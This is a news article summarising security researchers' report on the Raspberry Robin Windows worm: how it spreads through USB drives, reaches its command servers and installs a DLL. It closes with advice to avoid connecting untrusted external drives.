A new Windows malware has surfaced online, running active malicious campaigns. Researchers found this malware as part of a malicious cluster of activity identified as “Raspberry Robin.” The malware exhibits worm functionalities and spreads via external USB drives.
“Wormable” Raspberry Robin Windows Malware Discovered
Researchers from Red Canary, a US-based cybersecurity firm, have shared details about a malicious cluster of activity dubbed “Raspberry Robin.” As elaborated in their post, this malicious campaign drops a Windows malware that spreads like a worm via external drives.
Briefly, the researchers found this “malicious cluster of activity” in September 2021.They observed some recent activities detected in January 2022.
The malware has managed to stay under the radar, as evident from the VirusTotal analysis that shows fewer public reports. Nonetheless, it is actively targeting organizations.
This malware spreads to target computers via infected USB drives or other removable drives. The worm appears as a “.lnk” file for an otherwise legit folder in the USB, thus bluffing the victim. Upon inserting the infected drive into a system, the malware runs and executes its malicious activities according to the communication established with its C&C server.
In addition, the malware also installs a malicious DLL file on the target system, presumably, to attain persistence.
The malware abuses legit Windows components for all this process, like using Microsoft Standard Installer (msiexec.exe) or TOR nodes. As stated in the post,
This activity cluster relies on msiexec.exe to call out to its infrastructure, often compromised QNAP devices, using HTTP requests that contain a victim’s user and device names. We also observed Raspberry Robin use TOR exit nodes as additional command and control (C2) infrastructure.
It currently remains unclear how the malware manages to reach the external drives in the first place. Also, its subsequent activities and other processes, like the intention behind the malicious DLL installation, are yet to be deciphered. Hence, the exact threat actors behind this activity and their intentions and targets also remain under the radar.
For now, all users can do is avoid connecting external drives to their computers/devices unless they trust the source. While it already is recommended best practice, with Raspberry Robin, it becomes inevitable to implement this practice, especially in organizations.